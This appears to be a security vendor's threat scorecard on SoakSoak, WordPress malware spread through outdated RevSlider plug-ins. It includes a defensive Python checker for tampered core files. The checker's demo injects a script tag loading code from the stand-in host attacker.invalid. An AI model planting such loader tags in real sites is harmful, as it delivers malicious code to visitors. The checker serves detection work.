SoakSoak
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Ranking: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
| Metric | Value |
| --- | --- |
| Ranking | 16,775 |
| Threat Level | 80% (High) |
| Infected Computers | 759 |
| First Seen | February 12, 2015 |
| Last Seen | June 19, 2023 |
| OS(es) Affected | Windows |
The SoakSoak infection has compromised more than 100,000 WordPress websites. SoakSoak first attracted attention after Google blacklisted more than 11,000 domains associated with a threat campaign linked to SoakSoak.ru. These attacks have impacted hundreds of thousands of websites running the WordPress platform. SoakSoak is tied to a vulnerability in the popular WordPress plug-in RevSlider. That vulnerability was uncovered a few months before the campaign, so the surge in SoakSoak attacks is most likely the result of attackers exploiting it.
How SoakSoak Attacks a Computer
SoakSoak attacks by modifying one specific WordPress core file, wp-includes/template-loader.php. It injects threatening code into that file, which causes a script to be loaded into every Web page served by the affected domain. That script in turn loads a threatening JavaScript file from the SoakSoak.ru domain, which may then be used to carry out various unwanted tasks on the visitor's computer. Using a security program and a properly configured firewall can help prevent SoakSoak attacks and stop unauthorized scripts like these from loading.
The People Responsible for SoakSoak Attacks Have Updated Their Tactics
After Google blacklisted thousands of Web pages affected by SoakSoak, the people behind SoakSoak changed their tactics. The new wave of SoakSoak attacks also targets a second file, wp-includes/js/json2.min.js. The attack is similar: the attackers modify this file so that it loads a threatening Flash file that carries out the SoakSoak attack, and SoakSoak now also includes an additional script from another threatening domain. Website administrators running WordPress should take extra steps to protect their sites from these intrusions, paying special attention to plug-ins and making sure all software is kept up to date.
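Both waves described above modify WordPress core files that a site owner never edits by hand, so a practical defensive check is to compare those files against known-good hashes and flag any reference to an outside host. The script below is an added example, not EnigmaSoft's or WordPress's own tooling; the file contents, the known-good hashes and the host attacker.invalid are all constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# The two core files the write-up says SoakSoak modifies, relative to the WordPress root.
WATCHED_FILES = ("wp-includes/template-loader.php", "wp-includes/js/json2.min.js")

# A core file should never reference a third-party host; this broad pattern catches
# absolute (http://, https://) and protocol-relative (//host) references.
EXTERNAL_REF = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)

def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def check_core_files(wp_root, known_good, own_hosts):
    """Return (relative path, reason) findings. known_good maps relative path -> sha256 of
    a pristine copy of the same WordPress version; own_hosts are hosts the site may reference."""
    findings = []
    for rel in WATCHED_FILES:
        path = Path(wp_root) / rel
        if not path.exists():
            findings.append((rel, "missing"))
            continue
        if rel in known_good and sha256_of(path) != known_good[rel]:
            findings.append((rel, "hash mismatch against known-good copy"))
        hosts = {h.lower() for h in EXTERNAL_REF.findall(path.read_text(errors="replace"))}
        for host in sorted(hosts - set(own_hosts)):
            findings.append((rel, f"references external host {host}"))
    return findings

def demo():
    """Constructed stand-in files: a clean site first, then template-loader.php with an
    injected loader tag for a script on the constructed attacker host attacker.invalid."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        loader, js = (root / rel for rel in WATCHED_FILES)
        js.parent.mkdir(parents=True)
        loader.write_text("<?php\ndo_action('template_redirect');\n")
        js.write_text("var JSON;\n")
        known_good = {rel: sha256_of(root / rel) for rel in WATCHED_FILES}
        clean = check_core_files(root, known_good, {"example.com"})
        loader.write_text(loader.read_text() + "<script src='//attacker.invalid/x.js'></script>\n")
        infected = check_core_files(root, known_good, {"example.com"})
    return clean, infected

if __name__ == "__main__":
    print(demo())
```

On a real site, build known_good from a clean download of the exact WordPress version in use rather than from the files on the server.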
SoakSoak Attacks Have Been Associated with a Specific WordPress Plug-in
To carry out the attacks, third parties target old versions of RevSlider, a popular WordPress plug-in that is often packaged and bundled into WordPress themes. Versions prior to RevSlider 4.2 are being exploited by SoakSoak attacks. The RevSlider vulnerability had been discussed on underground sources several months earlier. One problem with RevSlider is that it is a premium plug-in that not every site owner can easily upgrade. In many cases, RevSlider is packaged or bundled into a WordPress theme without the website owner's knowledge. These two characteristics have increased the distribution and potential risk of SoakSoak attacks. RevSlider's developers patched the plug-in silently, but many websites have not been updated to include the patch, leaving them still vulnerable to these attacks.
What Is the Goal of SoakSoak Attacks
The main purpose of SoakSoak is to generate revenue at the expense of computer users. By distributing this threatening script, third parties can deliver threats to computers automatically and profit from them in various ways: adware could be installed to profit from advertising, or banking Trojans could be installed to gather victims' banking information. In many cases, the affected computer could be used as part of a botnet to carry out attacks or to distribute additional threats or spam email messages. Computer users should keep all of their software fully up to date, especially Flash and Java, which are both used by different variants of the SoakSoak attack. It is also highly recommended to use real-time protection while browsing the Web in order to prevent these types of threatening scripts from running on the websites visited.